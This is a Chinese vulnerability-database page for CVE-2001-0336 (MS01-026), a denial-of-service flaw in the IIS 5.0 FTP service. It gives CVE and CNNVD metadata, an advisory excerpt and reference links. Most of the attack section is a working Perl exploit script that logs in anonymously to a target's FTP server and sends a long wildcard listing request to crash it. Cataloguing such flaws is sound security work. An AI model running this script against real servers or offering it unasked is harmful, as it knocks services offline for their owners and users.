IIS漏洞

IIS漏洞

漏洞ID 1105837 漏洞类型 未知
发布时间 2000-05-14 更新时间 2001-06-27
图片[1]-IIS漏洞-安全小百科CVE编号 CVE-2001-0336
图片[2]-IIS漏洞-安全小百科CNNVD-ID CNNVD-200106-189
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20846
https://www.securityfocus.com/bid/88964
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-189
|漏洞详情
IIS5.0及其早期版本的MicrosoftMS00-060补丁引进了一个错误。攻击者借助畸形请求导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/2717/info

Due to a flaw in the pattern-matching function used by FTP commands, denial of service attacks can be successfully launched. If a user submits an FTP command along with a filename containing specially placed wildcard sequences, the pattern-matching function will not allocate sufficent memory. Resulting in IIS experiencing denial of service condition.

#!/usr/bin/perl
# Author:  Nelson Bunker - Critical Watch 
# 	   http://www.criticalwatch.com 
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026 
# Tested against several servers.  Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [[email protected]]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################


 use Net::FTP; 

        $wildcard='*********************************************************************************************************';

if (not $ARGV[0]) {

print qq~

       Usage: wildcard_dos.pl <host>

~;

        exit;}


        $IPaddress= $ARGV[0];


        $SIG {'PIPE'} = FoundIt;

        # create new FTP connection w/30 second timeout
        $ftp = Net::FTP->new($IPaddress, Timeout =>  5);

        if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}

        if(!$ftp->login("anonymous","tester@")){ die"FTP user anonymous on $IPaddress is unacceptable";}

        $bogus = $ftp->ls($wildcard);


sub FoundIt
        {
        print "This machine ($IPaddress) is affectedn";
	exit(0);

        }
|参考资料

来源:MS
名称:MS01-026
链接:http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
来源:XF
名称:iis-crosssitescripting-patch-dos(6858)
链接:http://xforce.iss.net/static/6858.php
来源:OSVDB
名称:5693
链接:http://www.osvdb.org/5693

相关推荐: AIX rsh缓冲区溢出漏洞

AIX rsh缓冲区溢出漏洞 漏洞ID 1205725 漏洞类型 缓冲区溢出 发布时间 2001-06-11 更新时间 2001-06-11 CVE编号 CVE-2001-1329 CNNVD-ID CNNVD-200106-056 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享